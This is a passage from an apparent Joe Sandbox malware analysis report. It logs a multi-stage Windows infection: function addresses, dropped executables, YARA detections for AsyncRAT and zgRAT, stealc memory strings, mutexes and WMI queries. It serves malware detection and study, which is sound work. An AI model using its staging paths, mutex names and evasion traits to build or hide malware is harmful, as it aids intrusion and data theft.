Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_05870007	9_2_05870007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_05870040	9_2_05870040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_05877C10	9_2_05877C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06B8A6B8	9_2_06B8A6B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06B867D8	9_2_06B867D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06B8A688	9_2_06B8A688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06B86FF8	9_2_06B86FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06B86FE8	9_2_06B86FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E476A8	9_2_06E476A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E4DE60	9_2_06E4DE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E4CE20	9_2_06E4CE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E4E7B8	9_2_06E4E7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E46DD8	9_2_06E46DD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E48DB0	9_2_06E48DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E4F2D8	9_2_06E4F2D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E4BA05	9_2_06E4BA05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E49218	9_2_06E49218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E413C0	9_2_06E413C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E4A3C8	9_2_06E4A3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E4B390	9_2_06E4B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E4C0B1	9_2_06E4C0B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E49858	9_2_06E49858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E4CE12	9_2_06E4CE12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E46A90	9_2_06E46A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E49208	9_2_06E49208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06E413B0	9_2_06E413B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00402320	13_2_00402320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004050C0	13_2_004050C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00420470	13_2_00420470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040FCF0	13_2_0040FCF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00419D19	13_2_00419D19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041951B	13_2_0041951B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00415635	13_2_00415635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041DEC3	13_2_0041DEC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00404F00	13_2_00404F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040CF8F	13_2_0040CF8F
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EF7600	14_2_00EF7600
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EF50E0	14_2_00EF50E0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EE40F5	14_2_00EE40F5
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EF004B	14_2_00EF004B
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EFB020	14_2_00EFB020
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EB1000	14_2_00EB1000
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EB91F0	14_2_00EB91F0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EB12A7	14_2_00EB12A7
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EBA3C0	14_2_00EBA3C0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EDC390	14_2_00EDC390
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EF9390	14_2_00EF9390
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EDA345	14_2_00EDA345
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EFB300	14_2_00EFB300
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EC0480	14_2_00EC0480
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EB7470	14_2_00EB7470
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EBB470	14_2_00EBB470
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EBE470	14_2_00EBE470
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EC1420	14_2_00EC1420
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EB5400	14_2_00EB5400
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EDD58E	14_2_00EDD58E
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EDD56C	14_2_00EDD56C
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00ECE52C	14_2_00ECE52C
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EE7620	14_2_00EE7620
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EE27B0	14_2_00EE27B0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EB3790	14_2_00EB3790
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EB9737	14_2_00EB9737
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EDC891	14_2_00EDC891
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EB8810	14_2_00EB8810
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EF9970	14_2_00EF9970
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EBA910	14_2_00EBA910
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EF5AD0	14_2_00EF5AD0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EB9A02	14_2_00EB9A02
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00ED7B0F	14_2_00ED7B0F
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EDBB00	14_2_00EDBB00
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EF9970	14_2_00EF9970
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EE8C00	14_2_00EE8C00
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EEFD0E	14_2_00EEFD0E
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EDDEF8	14_2_00EDDEF8
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EF7EDE	14_2_00EF7EDE
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EBFEBC	14_2_00EBFEBC
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EF9E60	14_2_00EF9E60
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EB7E70	14_2_00EB7E70
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EDDFE0	14_2_00EDDFE0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EBAFD0	14_2_00EBAFD0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EBBF80	14_2_00EBBF80
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EF8F80	14_2_00EF8F80
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EEEF50	14_2_00EEEF50
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Code function: 15_2_0100DC74	15_2_0100DC74
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Code function: 15_2_064867D0	15_2_064867D0
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Code function: 15_2_0648A3B7	15_2_0648A3B7
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Code function: 15_2_06483F50	15_2_06483F50
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Code function: 15_2_06486FE8	15_2_06486FE8
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Code function: 15_2_06486FF8	15_2_06486FF8
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_00199760	16_2_00199760
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_0019A879	16_2_0019A879
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001B1462	16_2_001B1462
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001D758B	16_2_001D758B
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001D8650	16_2_001D8650
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001D76AB	16_2_001D76AB
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_00194AF0	16_2_00194AF0
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001D2B00	16_2_001D2B00
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001B3C51	16_2_001B3C51
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001B0C73	16_2_001B0C73
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001C7CB3	16_2_001C7CB3
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_00194CF0	16_2_00194CF0
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001D6E39	16_2_001D6E39
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001D2F98	16_2_001D2F98
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001B5FF2	16_2_001B5FF2
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00219760	17_2_00219760
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00231462	17_2_00231462
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0025758B	17_2_0025758B
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00258650	17_2_00258650
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_002576AB	17_2_002576AB
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00214AF0	17_2_00214AF0
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00252B00	17_2_00252B00
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00230C73	17_2_00230C73
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00233C51	17_2_00233C51
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00247CB3	17_2_00247CB3
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00214CF0	17_2_00214CF0
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00256E39	17_2_00256E39
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00252F98	17_2_00252F98
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_00235FF2	17_2_00235FF2

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: String function: 00227F20 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: String function: 0022D7A2 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: String function: 0022DDE0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: String function: 001A7F20 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: String function: 001AD7A2 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: String function: 001ADDE0 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00407D30 appears 55 times
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: String function: 00EBCAD0 appears 53 times
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: String function: 00EBED80 appears 194 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024

Source: neon[1].exe.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: neon.exe.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: neon[1].exe.6.dr	Static PE information: No import functions for PE file found
Source: neon.exe.6.dr	Static PE information: No import functions for PE file found

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 37.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 36.2.rstxdhuj.exe.4141590.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 36.2.rstxdhuj.exe.418fdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: rstxdhuj[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gold[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gold.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 12dsvc[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9972485950272479
Source: file.exe	Static PE information: Section: ukgzfzxu ZLIB complexity 0.99462749421631
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9972485950272479
Source: axplong.exe.0.dr	Static PE information: Section: ukgzfzxu ZLIB complexity 0.99462749421631
Source: 2a8f2f9086.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9982863589918256
Source: 2a8f2f9086.exe.6.dr	Static PE information: Section: ewzoukzh ZLIB complexity 0.9947279526245552

Source: 2a8f2f9086.exe.6.dr

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: neon[1].exe.6.dr, Zz36.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: neon.exe.6.dr, Zz36.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@73/109@19/21

Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe

Code function: 14_2_00EE81AA CoCreateInstance,

14_2_00EE81AA

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\gold[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1084:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:64:WilError_03
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\TSXTkO0pNBdN2KNw
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2612:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: Yara match	File source: 32.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000000.2916373422.0000000000401000.00000020.00000001.01000000.0000001E.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000009.00000002.2875623535.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003759000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003743000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000003.2861649685.00000000210BD000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000003.2837589880.00000000210C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002C8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 